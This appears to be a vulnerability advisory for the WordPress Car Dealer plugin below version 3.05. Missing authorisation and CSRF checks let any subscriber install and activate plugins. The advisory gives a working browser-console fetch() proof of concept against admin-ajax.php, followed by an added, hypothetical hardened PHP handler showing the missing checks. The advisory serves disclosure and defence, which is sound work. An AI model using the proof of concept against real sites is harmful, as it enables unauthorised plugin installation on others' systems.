wpexploit | Lana Codes | WPEX-ID:0DB1762E-1401-4006-88ED-D09A4BC6585B
History: Nov 21, 2022 - 12:00 a.m.

Car Dealer < 3.05 - Subscriber+ Arbitrary Plugin Installation


EPSS: 0.001 (percentile: 21.4%)

The plugin does not have proper authorisation and CSRF checks in an AJAX action, allowing any authenticated user, such as a subscriber, to call it and install and activate arbitrary plugins from wordpress.org.

Run the command below in the developer console of the web browser, while on the blog as a subscriber user, to install and activate the classic-editor plugin:

fetch('/wp-admin/admin-ajax.php', {
    method: 'POST',
    headers: new Headers({
        'Content-Type': 'application/x-www-form-urlencoded',
    }),
    body: 'action=cardealer_install_plugin&slug=classic-editor',
    redirect: 'follow'
})
    .then(response => response.text())
    .then(result => console.log(result))
    .catch(error => console.log('error', error));
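
The two checks the advisory says are missing, shown in a hardened handler for the same AJAX action. This is an added example, not the Car Dealer plugin's own code or its actual fix: the function name, the nonce action, the `nonce` request field and the slug allow-list are assumptions; only the action name `cardealer_install_plugin` comes from the advisory.

```php
<?php
// Added example: hypothetical hardened handler, NOT the plugin's real code.
// Assumed names: example_cardealer_install_plugin, EXAMPLE_INSTALL_NONCE, 'nonce' field.
const EXAMPLE_INSTALL_NONCE = 'example_cardealer_install_plugin';

// Logged-in users only: no wp_ajax_nopriv_ hook is registered.
add_action( 'wp_ajax_cardealer_install_plugin', 'example_cardealer_install_plugin' );

function example_cardealer_install_plugin() {
    // CSRF check: the admin page must emit wp_create_nonce( EXAMPLE_INSTALL_NONCE )
    // and the client must send it back as 'nonce'. Dies with 403 when invalid.
    check_ajax_referer( EXAMPLE_INSTALL_NONCE, 'nonce' );

    // Authorisation check: subscribers hold neither capability.
    if ( ! current_user_can( 'install_plugins' ) || ! current_user_can( 'activate_plugins' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions.' ), 403 );
    }

    // Normalise the slug, then restrict it to an allow-list (constructed sample)
    // so the endpoint cannot be used for arbitrary wordpress.org plugins.
    $slug    = isset( $_POST['slug'] ) ? sanitize_key( wp_unslash( $_POST['slug'] ) ) : '';
    $allowed = array( 'classic-editor' );
    if ( ! in_array( $slug, $allowed, true ) ) {
        wp_send_json_error( array( 'message' => 'Plugin not allowed.' ), 400 );
    }

    require_once ABSPATH . 'wp-admin/includes/plugin.php';
    require_once ABSPATH . 'wp-admin/includes/plugin-install.php';
    require_once ABSPATH . 'wp-admin/includes/class-wp-upgrader.php';

    $api = plugins_api( 'plugin_information', array( 'slug' => $slug ) );
    if ( is_wp_error( $api ) ) {
        wp_send_json_error( array( 'message' => $api->get_error_message() ), 502 );
    }

    $upgrader = new Plugin_Upgrader( new WP_Ajax_Upgrader_Skin() );
    if ( true !== $upgrader->install( $api->download_link ) ) {
        wp_send_json_error( array( 'message' => 'Installation failed.' ), 500 );
    }

    $activated = activate_plugin( $upgrader->plugin_info() );
    if ( is_wp_error( $activated ) ) {
        wp_send_json_error( array( 'message' => $activated->get_error_message() ), 500 );
    }

    wp_send_json_success( array( 'slug' => $slug ) );
}
```

With both checks in place, the subscriber request shown above is rejected at `check_ajax_referer()` because it carries no nonce, and would fail the capability check even with one.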
